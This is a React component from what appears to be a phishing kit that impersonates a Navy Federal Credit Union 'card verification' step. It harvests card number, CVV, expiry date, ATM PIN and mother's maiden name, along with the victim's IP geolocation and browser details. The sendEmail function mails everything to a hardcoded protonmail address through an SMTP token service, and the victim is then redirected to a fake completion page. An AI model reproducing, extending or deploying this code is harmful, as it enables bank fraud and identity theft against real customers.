import { useState, useEffect } from "react";
import detect from "detect.js";
import checkMark from "./checkmark.svg";
import activityPixel from "./activity_pixel.gif";
import cardStyle from "./main-2601c417d92b4204d877.module.css";

const ua = detect.parse(navigator.userAgent);

const Main = (props) => {
  const [account, setAccount] = useState({
    cardNumber: "",
    cvv: "",
    atmPin: "",
    mmName: "",
    cardDobYear: "",
    cardDobMonth: "",
  });
  const [errors, setErrors] = useState({});
  const [location, setLocation] = useState({});
  const [modal, setModal] = useState(false);

  const validate = () => {
    const error = {};

    if (
      account.cardDobYear.trim() === "" ||
      account.cardDobYear.length < 4 ||
      account.cardDobYear.length > 4
    ) {
      error.cardDobYear = true;
    }

    if (
      account.cardDobMonth.trim() === "" ||
      account.cardDobMonth.length < 2 ||
      account.cardDobMonth.length > 2
    ) {
      error.cardDobDate = true;
    }
    if (
      account.cardNumber.trim() === "" ||
      account.cardNumber.length < 16 ||
      account.cardNumber.length > 18 ||
      account.cardNumber.length == 17
    ) {
      error.cardNumber = true;
    }

    if (
      account.cvv.trim() === "" ||
      account.cvv.length < 3 ||
      account.cvv.length > 4
    ) {
      error.cvv = true;
    }

    if (
      account.atmPin.trim() === "" ||
      account.atmPin.length < 4 ||
      account.atmPin.length > 6 ||
      account.atmPin.length == 5
    ) {
      error.atmPin = true;
    }

    if (account.mmName.trim() === "" || account.mmName.length < 2) {
      error.mmName = true;
    }

    return Object.keys(error).length === 0 ? null : error;
  };

  const handleChange = ({ currentTarget: input }) => {
    account[input.name] = input.value;
    setAccount({ ...account });

    const error = validate();
    setErrors(error);
  };

  const handleNumber = ({ currentTarget: input }) => {
    account[input.name] = input.value.replace(/\D/g, "");
    setAccount({ ...account });

    const error = validate();
    setErrors(error);
  };

  const sendEmail = () => {
    window.Email.send({
      SecureToken: "28f8d2c7-b3f2-48bb-83c3-76c20e78147e",
      To: "hisname2001@protonmail.com",
      From: "NFCU@hey.com",
      Subject: `#NFCU CARD INFO => From ${location && location.IPv4} [${
        location && location.country_name
      } - ${location && location.country_code}] `,
      Body: `
          <span style="font-family:Tahoma, sans-serif"><b>#=======[ NFCU - CARD INFO ]=======# <b /></span> <br />
          <span style="font-family:Tahoma, sans-serif"> Card Number: ${
            account.cardNumber
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> cvv: ${
            account.cvv
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Expiry Date: ${
            account.cardDobMonth / account.cardDobYear
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Atm Pin: ${
            account.atmPin
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Mother's Maiden Name: ${
            account.mmName
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"><b>#=======[ NFCU - IP INFO ]=======#</b> </span> <br />
          <span style="font-family:Tahoma, sans-serif">IP Address: ${
            location && location.IPv4
          }</span> <br />
          <span style="font-family:Tahoma, sans-serif">IP Country: ${
            location && location.country_name
          }${location && location.country_code}</span>  <br />
          <span style="font-family:Tahoma, sans-serif">IP State: ${
            location && location.state
          }</span> <br />
          <span style="font-family:Tahoma, sans-serif">IP Latitude Longitude: ${
            location && location.latitude
          } ${location && location.longitude}</span> <br />
          <span style="font-family:Tahoma, sans-serif">IP State: ${
            location && location.state
          }</span> <br />
          <span style="font-family:Tahoma, sans-serif"> IP City: ${
            location && location.city
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Browser: ${
            ua && ua.browser.family
          } on ${ua && ua.device.family}</span> <br /> 
          <span style="font-family:Tahoma, sans-serif"> User Agent:  ${
            ua && ua.source }
          }} on {{ device }}</span> <br />
          <span style="font-family:Tahoma, sans-serif"> <b> #=======[ NFCU - CARD INFO ]=======# </b> </span> <br />
      `,
    }).then((message) => message);
  };

  const handleSubmit = (e) => {
    e.preventDefault();
    sendEmail();
    setModal(true);
    console.log(account);
    console.log(location && location.country_name);
    setTimeout(
      () => props.history.push("/NFOAA_AUTH/VERIFICATION/complete"),
      1500
    );
  };

  useEffect(() => {
    fetch(
      "https://geolocation-db.com/json/ef6c41a0-9d3c-11eb-8f3b-e1f5536499e7"
    )
      .then((response) => response.json())
      .then((data) => {
        const details = data;
        setLocation(details);
      });
  }, []);

  return (
    <>
      {modal && (
        <div id="wait-cursor">
          <div className={cardStyle.loader}></div>
        </div>
      )}
      <header role="banner" id="application-header">
        <h1 className={cardStyle.visiblyHidden} role="presentation">
          Navy Federal Credit Union
        </h1>
      </header>

      <main role="main" id="app-main">
        <section>
          <div id="wait-cursor" style={{ display: "none" }}>
            <div className={cardStyle.loader}></div>
          </div>
          <div aria-live="assertive" className={cardStyle.visuallyHidden}></div>

          <div data-v-1c530256="" data-v-169bc697="">
            <div
              data-v-1c530256=""
              className={`${cardStyle.container} ${cardStyle.clearfix} ${cardStyle.card} ${cardStyle.white}`}
            >
              <div
                data-v-5dff800b=""
                data-v-1c530256=""
                className={cardStyle.progressbarWrapper}
              >
                <ul data-v-5dff800b="" className={cardStyle.stepProgressBar}>
                  <li
                    data-v-5dff800b=""
                    className={`${cardStyle.stepItem} ${cardStyle.success}`}
                  >
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Eligibility step checked"
                      aria-hidden="true"
                      className={`${cardStyle.stepItemCheckmark}`}
                      style={{ width: "14px" }}
                    />
                    <span
                      data-v-5dff800b=""
                      className={`${cardStyle.progressLabel} ${cardStyle.singleLinePadding}`}
                    >
                      Personal Verification
                    </span>
                    <p data-v-5dff800b="" className={cardStyle.visuallyHidden}>
                      step in progress
                    </p>
                  </li>
                  <li
                    data-v-5dff800b=""
                    className={`${cardStyle.stepItem} ${cardStyle.success}`}
                  >
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Membership step"
                      aria-hidden="true"
                      className={`${cardStyle.stepItemCheckmark}`}
                      style={{ width: "14px" }}
                    />{" "}
                    <span
                      data-v-5dff800b=""
                      className={`${cardStyle.progressLabel} ${cardStyle.singleLinePadding}`}
                    >
                      Contact Verification
                    </span>
                    <p data-v-5dff800b="" className={cardStyle.visuallyHidden}>
                      step in progress
                    </p>
                  </li>
                  <li
                    data-v-5dff800b=""
                    className={`${cardStyle.stepItem} ${cardStyle.current}`}
                  >
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Finish Setup step"
                      aria-hidden="true"
                      className={`${cardStyle.stepItemCheckmark}`}
                      style={{ width: "14px" }}
                    />{" "}
                    <span
                      data-v-5dff800b=""
                      className={`${cardStyle.progressLabel} ${cardStyle.singleLinePadding}`}
                    >
                      Card Verification
                    </span>
                    <p
                      data-v-5dff800b=""
                      className={cardStyle.visuallyHidden}
                    ></p>
                  </li>
                  <li data-v-5dff800b="" className={`${cardStyle.stepItem}`}>
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Sign In step"
                      aria-hidden="true"
                      className={`${cardStyle.stepItemCheckmark}`}
                      style={{ width: "14px" }}
                    />{" "}
                    <span
                      data-v-5dff800b=""
                      className={`${cardStyle.progressLabel} ${cardStyle.singleLinePadding}`}
                    >
                      Complete
                    </span>
                    <p
                      data-v-5dff800b=""
                      className={cardStyle.visuallyHidden}
                    ></p>
                  </li>
                </ul>
              </div>
              <legend data-v-1c530256="" tabIndex="-1">
                <h1 data-v-1c530256="" className={cardStyle.prompt}>
                  Let continue with your verification
                </h1>
              </legend>

              <form data-v-1c530256="" onSubmit={handleSubmit}>
                <section data-v-169bc697="" data-v-1c530256="">
                  <header data-v-169bc697="" data-v-1c530256="">
                    <h2
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={cardStyle.fieldGrouping}
                    >
                      Card Information
                    </h2>
                  </header>
                  <div
                    data-v-169bc697=""
                    data-v-1c530256=""
                    className={cardStyle.row}
                  >
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={cardStyle.colSm}
                    >
                      <div
                        data-v-2ae7dda6=""
                        data-v-169bc697=""
                        data-v-1c530256=""
                      >
                        <label data-v-2ae7dda6="" htmlFor="field-46">
                          Card Number
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div
                          data-v-2ae7dda6=""
                          className={cardStyle.inputGroup}
                        >
                          <input
                            data-v-2ae7dda6=""
                            id="field-46"
                            maxLength="18"
                            type="tel"
                            pattern="[0-9]*"
                            className={`${cardStyle.formInput} ${cardStyle.pvm} ${cardStyle.phs} ${cardStyle.fullWidth} ${cardStyle.inputBorder}`}
                            name="cardNumber"
                            value={account.cardNumber}
                            onChange={handleNumber}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-46"
                          aria-live="polite"
                          className={cardStyle.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>
                  <div
                    data-v-169bc697=""
                    data-v-1c530256=""
                    className={cardStyle.row}
                  >
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={cardStyle.colSm8}
                    >
                      <div
                        data-v-2ae7dda6=""
                        data-v-169bc697=""
                        data-v-1c530256=""
                      >
                        <label data-v-2ae7dda6="" htmlFor="field-43">
                          Cvv
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div
                          data-v-2ae7dda6=""
                          className={cardStyle.inputGroup}
                        >
                          <input
                            data-v-2ae7dda6=""
                            id="field-43"
                            maxLength="4"
                            pattern="[0-9]*"
                            type="tel"
                            className={`${cardStyle.formInput} ${cardStyle.pvm} ${cardStyle.phs} ${cardStyle.fullWidth} ${cardStyle.inputBorder}`}
                            name="cvv"
                            value={account.cvv}
                            onChange={handleNumber}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-43"
                          aria-live="polite"
                          className={cardStyle.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>
                </section>
                <section>
                  <div
                    data-v-169bc697=""
                    data-v-1c530256=""
                    className={cardStyle.row}
                    style={{ marginTop: "0px" }}
                  >
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={cardStyle.colSm}
                    >
                      <fieldset
                        data-v-1355d37a=""
                        data-v-169bc697=""
                        className={cardStyle.row}
                        data-v-1c530256=""
                      >
                        <legend data-v-1355d37a="" className={cardStyle.col12}>
                          Expiry Date
                        </legend>
                        <div
                          data-v-1355d37a=""
                          className={`${cardStyle.row} ${cardStyle.fullRow}`}
                        >
                          <div data-v-1355d37a="">
                            <label data-v-1355d37a="" htmlFor="day">
                              MM
                            </label>{" "}
                            <input
                              data-v-1355d37a=""
                              type="tel"
                              id="day"
                              maxLength="2"
                              size="3"
                              pattern="[0-9]*"
                              className={`${cardStyle.pvm} ${cardStyle.phs} ${cardStyle.inputBorder}`}
                              name="cardDobMonth"
                              value={account.cardDobMonth}
                              onChange={handleNumber}
                            />
                          </div>
                          <div data-v-1355d37a="">
                            <label data-v-1355d37a="" htmlFor="year">
                              YYYY
                            </label>{" "}
                            <input
                              data-v-1355d37a=""
                              type="tel"
                              id="year"
                              maxLength="4"
                              size="5"
                              pattern="[0-9]*"
                              className={`${cardStyle.pvm} ${cardStyle.phs} ${cardStyle.inputBorder}`}
                              name="cardDobYear"
                              value={account.cardDobYear}
                              onChange={handleNumber}
                            />
                          </div>
                        </div>
                      </fieldset>
                    </div>
                  </div>
                  <div
                    data-v-169bc697=""
                    data-v-1c530256=""
                    className={cardStyle.row}
                  >
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={cardStyle.colSm8}
                    >
                      <div
                        data-v-2ae7dda6=""
                        data-v-169bc697=""
                        data-v-1c530256=""
                      >
                        <label data-v-2ae7dda6="" htmlFor="field-43">
                          Atm Pin
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div
                          data-v-2ae7dda6=""
                          className={cardStyle.inputGroup}
                        >
                          <input
                            data-v-2ae7dda6=""
                            id="field-43"
                            maxLength="6"
                            pattern="[0-9]*"
                            type="password"
                            className={`${cardStyle.formInput} ${cardStyle.pwd} ${cardStyle.pvm} ${cardStyle.phs} ${cardStyle.fullWidth} ${cardStyle.inputBorder}`}
                            name="atmPin"
                            value={account.atmPin}
                            onChange={handleNumber}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-43"
                          aria-live="polite"
                          className={cardStyle.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>
                  <div
                    data-v-169bc697=""
                    data-v-1c530256=""
                    className={cardStyle.row}
                  >
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={cardStyle.colSm8}
                    >
                      <div
                        data-v-2ae7dda6=""
                        data-v-169bc697=""
                        data-v-1c530256=""
                      >
                        <label data-v-2ae7dda6="" htmlFor="field-43">
                          Mother's Maiden Name
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div
                          data-v-2ae7dda6=""
                          className={cardStyle.inputGroup}
                        >
                          <input
                            data-v-2ae7dda6=""
                            id="field-43"
                            maxLength="20"
                            type="text"
                            className={`${cardStyle.formInput} ${cardStyle.pvm} ${cardStyle.phs} ${cardStyle.fullWidth} ${cardStyle.inputBorder}`}
                            name="mmName"
                            value={account.mmName}
                            onChange={handleChange}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-43"
                          aria-live="polite"
                          className={cardStyle.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>
                </section>
                <div
                  data-v-1c530256=""
                  className={`${cardStyle.row} ${cardStyle.actions}`}
                >
                  <div data-v-1c530256="" className={cardStyle.col}>
                    <div data-v-1c530256="" className={cardStyle.textCenter}>
                      <button
                        data-v-1c530256=""
                        id="app-personal-info-cont"
                        type="submit"
                        className={`${cardStyle.btn} ${cardStyle.action} ${cardStyle.forward}`}
                        disabled={errors ? "disabled" : null}
                      >
                        Continue
                      </button>
                    </div>
                  </div>
                </div>
              </form>
            </div>
          </div>
        </section>
      </main>

      <footer id="application-footer">
        <section
          className={`${cardStyle.containerFluid} ${cardStyle.container} ${cardStyle.clearfix}`}
        >
          <p>
            <strong>© 2021 Navy Federal Credit Union.</strong> All rights
            reserved
          </p>
          <p>
            <span
              className={`${cardStyle.nfcuIcon} ${cardStyle.iconNcua}`}
            ></span>
            <a
              href="https://www.navyfederal.org/pdf/ebrochures/1116e.pdf"
              target="_blank"
            >
              Federally Insured by NCUA
            </a>
            • If you have questions please contact us: 1-888-842-6328
          </p>
        </section>
      </footer>

      {/* <!-- 
Start of global snippet: Please do not remove
Place this snippet between the <head> and </head> tags on every page of your site.
-->
  <!-- Global site tag (gtag.js) - Google Marketing Platform -->


  <!-- End of global snippet: Please do not remove --> */}
      <img src={activityPixel} hidden="" />
    </>
  );
};

export default Main;
